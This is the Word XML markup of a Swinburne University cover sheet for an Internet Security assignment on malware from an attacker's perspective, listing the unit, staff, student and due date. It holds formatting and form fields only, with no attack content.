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1F351" w14:textId="77777777" w:rsidR="002613AA" w:rsidRDefault="002613AA" w:rsidP="007D6710"/>
    <w:bookmarkStart w:id="0" w:name="_MON_993026936"/>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkStart w:id="1" w:name="_MON_993026913"/>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="7F96B199" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="00EA225C" w:rsidRDefault="002613AA" w:rsidP="002613AA">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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA225C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:object w:dxaOrig="2056" w:dyaOrig="4126" w14:anchorId="26009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5pt;height:106.15pt" o:ole="" fillcolor="window">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Word.Picture.8" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1805301667" r:id="rId8"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="53284606" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Swinburne University </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Technology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B132F5E" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>School of Science, Computing, and Engineering Technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0D0529" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>ASSIGNMENT AND PROJECT COVER SHEET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208BD1D5" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EFDAD59" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="177FEFF4" w14:textId="56FEFCA8" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Unit Code:</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>COS80013</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Unit Title:</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Internet Security</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                          </w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1871E8E0" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Assignment number and title:</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">    Assignment-1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A51CB6" w14:textId="181F303D" w:rsidR="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> A comparative research review of cyber-attacks and cyber security focusing on Malware </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>rom an Attackers Perspective</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0450A770" w14:textId="0F2F9772" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Due date:</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>13 /04/2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A109F0" w14:textId="77777777" w:rsidR="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Lab/tut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> group:</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Friday – 6:30 pm lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Tutor:</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Yasa Akurudda Liyanage Don</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="253415EF" w14:textId="2C77D6D6" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Lecturer:     </w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Rory </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Coulter ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yasa Akurudda Liyanage Don</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3A25AC" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C42C00" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EA57D2" w14:textId="42C1D49A" w:rsidR="002613AA" w:rsidRPr="00835C0B" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Family name:</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Arun Ragavendhar Arunachalam </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Palaniyappan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> no:</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>104837</w:t>
      </w:r>
      <w:r w:rsidR="005B3CD4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E37FD89" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To be completed if this is an INDIVIDUAL ASSIGNMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25066057" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>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00AAAED8" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:pStyle w:val="Footer"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D53C7E" w14:textId="14BCBE0B" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
        <w:t>Signature:</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71822312" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5A49BC" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68CBA655" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Marker's comments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B90097" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F588868" w14:textId="77777777" w:rsidR="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3827081A" w14:textId="77777777" w:rsidR="00835C0B" w:rsidRPr="002613AA" w:rsidRDefault="00835C0B" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D280C8C" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="547617AC" w14:textId="77777777" w:rsidR="002613AA" w:rsidRDefault="002613AA" w:rsidP="002613AA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
